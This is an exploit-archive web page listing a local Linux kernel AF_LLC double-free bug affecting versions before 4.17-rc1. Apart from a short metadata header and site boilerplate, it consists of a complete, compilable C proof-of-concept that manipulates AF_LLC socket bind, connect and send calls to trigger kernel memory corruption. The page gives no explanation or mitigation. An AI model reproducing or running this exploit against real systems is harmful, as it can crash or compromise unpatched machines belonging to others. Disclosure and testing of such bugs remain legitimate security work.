Linux Kernel < 4.17-rc1 AF_LLC Double Free

2018.05.04
Credit: SecuriTeam
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#define _GNU_SOURCE #include <endian.h> #include <sys/syscall.h> #include <unistd.h> #include <errno.h> #include <sched.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdio.h> #include <sys/prctl.h> #include <sys/resource.h> #include <sys/time.h> #include <sys/wait.h> #include <stdint.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/socket.h> struct sockaddr_llc { short sllc_family; short sllc_arphrd; unsigned char sllc_test; unsigned char sllc_xid; unsigned char sllc_ua; unsigned char sllc_sap; unsigned char sllc_mac[6]; unsigned char __pad[2]; }; void test() { int fd = socket(AF_LLC, SOCK_STREAM, 0); char output[32] = "lo"; socklen_t len; setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10); struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2}; bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc)); struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2}; connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc)); char msg[0x10] = "aaaa"; send(fd, msg, 0x10, 0); } int main() { test(); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top